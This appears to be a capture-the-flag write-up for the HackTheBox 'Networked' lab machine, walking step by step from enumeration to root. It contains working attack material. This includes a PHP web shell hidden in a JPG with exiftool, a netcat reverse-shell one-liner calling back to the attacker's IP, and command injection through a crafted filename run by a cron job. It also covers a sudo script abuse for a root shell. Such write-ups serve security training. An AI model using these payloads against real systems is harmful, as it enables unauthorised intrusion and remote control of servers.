CTF WriteupsHackthebox Writeups

HackTheBox Networked

HackTheBox Cybersecurity

HackTheBox Networked

 

In this article HackTheBox Networked we are going to talk about Networked Machine on Hackthebox platform.

 

Nmap:

  • 80/tcp
  • 22/tcp

User Part

  • there’s to open port 80,22 , let’s first check port 80
  • in source code there’s 3 pages not linked to the home

page , it’s php

– we can run gobuster to get these pages

$> gobuster dir -u http://10.10.10.146/ -w /usr/share/

wordlists/dirb/common.txt -x php

 

– we see /backup , theres’ backup.tar let’s install it

$> decompress it : tar -xvf backup.tar

 

– we have 2 interesting php files

* photos.php < to see the images

* upload.php < to upload an image

* let’s try to upload a shell

– there’s a whitelist for valid extentions

$> $validext = array(‘.jpg’, ‘.png’, ‘.gif’, ‘.jpeg’);

HackTheBox Networked

 

– this link is very helpful

* https://github.com/xapax/security/blob/master/

bypass_image_upload.md

– i use exiftool technique

– let’s get and jpg image and insert php code to get a

web shell

1: exiftool -Comment='<?php echo “<pre>”;

system($_GET[‘cmd’]); ?>’ jpg.jpg

2: mv jpg.jpg shell.php.jpg

– let try to upload it

– open the image location and run /?cmd=ls

 

http://10.10.10.146/uploads/10_10_14_29.php.jpg?cmd=ls

HackTheBox Networked

 

– now lets grap a reverse shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc

10.10.14.29 9091 >/tmp/f

– change ip , port and encode & with %26 (url encode)

– after making revshell there’s two intersing files in guly user

* check_attack.php

* crontab.sh

 

In check_attack.php , the code get all files in /var/www/

html/uploads and remove them with exec() , so we can

rename our file in uploads to make command injection.

; nc IP PORT -c bash

 

NOTE: -e /bin/bash will not work , we need to use -c bash

 

 

create a file in /var/www/html/uploads/

$> touch “; nc 10.10.14.29 9090 -c bash”

$> run nc ( Attack machine )

– wait 3 min or less.

– open shell with guly , in /home/guly

user.txt : 526cfc2305f17faaacecf212c57d71c5

Root Part

– lookiing in the system

$> ps aux | grep root

$> netstat -nutlp

$> find / -perm -u=s -type f 2>/dev/null

– see what user can run

$> find / -executable -type f 2>/dev/null

$> sudo -l

It’s take the value from input and create a network

interface file and then use ifup , with some RegEx it need

a space with input so if we provide it bash /bin/sh will run

sh and gives root shell

$> sudo -u root /usr/local/sbin/changename.sh

– fill all inputs with: bash /bin/sh

 

root.txt: 0a8ecda83f1d81251099e8ac3d0dcb82

HackTheBox Networked

 

 

DC-5 vulnhub walkthrough

DC-3 vulnhub walkthrough

DC-2 vulnhub walkthrough

Tags

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button
Close